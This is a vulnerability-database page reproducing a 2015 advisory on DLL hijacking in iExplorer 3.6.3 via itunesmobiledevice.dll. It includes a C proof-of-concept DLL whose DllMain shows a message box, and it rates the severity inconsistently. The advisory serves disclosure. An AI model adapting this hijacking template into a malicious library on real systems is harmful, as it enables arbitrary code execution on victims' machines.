iExplorer 3.6.3 - DLL Hijacking Exploit itunesmobiledevice.dll

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1041149 漏洞类型
发布时间 2015-10-05 更新时间 2015-10-05
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015100030
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Document Title:
===============
iExplorer 3.6.3 - DLL Hijacking Exploit itunesmobiledevice.dll

=============
2015-07-30


Product & Service Introduction:
===============================
iExplorer lets you easily transfer music from any iPhone, iPod or iPad to a Mac or PC computer and iTunes. You can search for
and preview particular songs then copy them to iTunes with the touch of a button or with drag and drop. Looking to transfer
more than just a few tracks? With one click, iExplorer lets you instantly rebuild entire playlists or use the Auto Transfer
feature and copy everything from your device to iTunes.


Discovery Status:
=================
Published


Affected Product(s):
====================
Macroplant
Product: iExplorer 3.6.3.0


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
Macroplant iExplorer could allow a remote attacker to execute arbitrary code on the system. The application does not directly specify the fully
qualified path to a dynamic-linked library (itunesmobiledevice.dll) when running on Microsoft Windows. By persuading a victim to open a
specially-crafted file from a WebDAV or SMB share using a vulnerable application, a remote attacker could exploit this vulnerability via a
specially-crafted library to execute arbitrary code on the system.


Proof of Concept (PoC):
=======================
/*
* Exploit Title: iExplorer 3.6.3.0  DLL Hijacking Exploit (itunesmobiledevice.dll)
* Author: Tonel Team[Zeus_Syborg]
* Vendor Homepage: http://www.macroplant.com/
* Soft link :http://www.macroplant.com/downloads
* Tested on: Windows 8.1Google chrome

*/

#include <windows.h>

BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
  {
  case DLL_PROCESS_ATTACH:
    owned();
  case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
  break;
  }
  return TRUE;
}

int owned() {
  MessageBox(0, "iExplorer DLL HijackedZeus_Syborg", "POC", MB_OK);
}


Security Risk:
==============
The security risk of the local software vulnerability is estimated as medium. (CVSS 8.0)


Credits & Authors:
==================
Zeus_Syborg [Tonel Team]